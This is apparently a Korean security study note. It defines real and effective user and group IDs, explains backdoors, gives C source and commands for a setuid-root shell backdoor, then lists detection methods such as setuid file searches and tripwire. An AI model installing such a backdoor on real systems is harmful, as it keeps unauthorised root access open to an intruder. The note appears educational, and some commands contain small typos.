2015.03.03

RUID : real uid (실제계정)

RGID : real gid (실제그룹)

EUID : effective uid ( 어떤 유저권한으로 프로세스를 실행중인가)

EGID : effective gid ( 어떤 그룹권한으로 프로세스를 실행중인가)

backdoor

- backdoor 는 공격으로 루트권한을 얻은후 차후에 접근을 다시하기위해 설치하는 프로그램이다.

- 시스템에 비인가 접근 시도 프로그램.

backdoor 만드는법

1. backdoor.c 생성

backdoor.c

#include <stdio.h>

main()

{

setuid(0); //uid 0으로 설정

setgid(0); //gid 0으로설정

system("/bin/sh"); /sh쉘사용

}

2. gcc -o backdoor backdoor.c 입력(backdoor.c 컴파일후 실행파일 생성)

3. chmod 4755 backdoor -> backdoor파일에다가 Setuid를 걸어준다. setuid를 걸어주는이유는 root권한을 빌려와 uid와 gid를 0으로 설정하기때문이다. 

4. root가 아닌 사용자로 로그인하여 backdoor프로그램 실행

5. id 명령어를 입력하여 uid와 gid를 확인다.

backdoor 탐지

1. 현재 동작중인 프로세스 및 포트확인을한다.

- ps -ef , netstat -na 명령어 사용.

2. SetUID 파일 검사

- find / -perm +4000 2>dev/null -> setuid가 걸린 파일 검색

3. 백도어 탐지툴 이용

- 백신

4. 해시값검사

- tripwire

5. 로그분석

/tmp/log.txt